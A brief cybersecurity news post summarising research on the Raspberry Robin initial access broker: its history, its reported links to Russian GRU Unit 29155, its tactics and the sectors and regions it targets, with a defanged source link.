New research reveals that Raspberry Robin, once a minor player in the cybercrime world, has rapidly developed into a threat actor and plays a constant role in Russian government and its backed group’s cyberattacks.
Background
Originally, Raspberry Robin operated by delivering its worm payloads through infected USB drives. Between 2019 and 2023, it predominantly targeted print and copy shops, using malicious Windows shortcut files disguised as folders to activate its malware.
Raspberry Robin is now working closely with Russian General Staff Main Intelligence Directorate (GRU) Unit 29155, known for its sabotage, espionage, and disinformation operations targeting global entities. This group is known for acting as an initial access broker (IAB) for cyberattacks carried out by the Russian government and its backed group.
The group has since expanded its reach, working with notable Russian threat actors like LockBit, SocGholish, and Dridex.
Current Operations
-
- Raspberry Robin now utilizes highly advanced tactics, including using compromised QNAP NAS boxes, routers, and IoT devices, alongside multilayered malware packing techniques. Sometimes this involves up to 14 layers.
- As a business model, Raspberry Robin sells access to other cybercriminal groups, making it hard to attribute its involvement in the initial stages of a breach.
- Raspberry Robin’s use of N-day vulnerabilities—flaws for which patches may or may not be available—suggests a deep connection to the underground cybercrime economy.
Targets
Initially Raspberry Robin focused heavily on manufacturing and technology sectors, now it has broadened its scope. From last year, it began targeting industries such as oil and gas, transportation, retail, education and governments.
The majority of the victims were government agencies and telecommunication organizations from Latin America, Australia, and Europe. It is a very notorious threat actor, as its infection attempts were observed in 17% of worldwide managed detection and response (MDR) clients in various industries.
The Bottom Line
Although much remains unknown about Raspberry Robin’s infrastructure and operations, its rapid rise signals that the IAB business is thriving. Analysts are continuing to investigate the group’s connections within the cybercrime underground, as well as how it structures its payouts.
Source:hxxps[://]www[.]silentpush[.]com/blog/raspberry-robin/
Follow us on X and LinkedIn for the latest cybersecurity news.
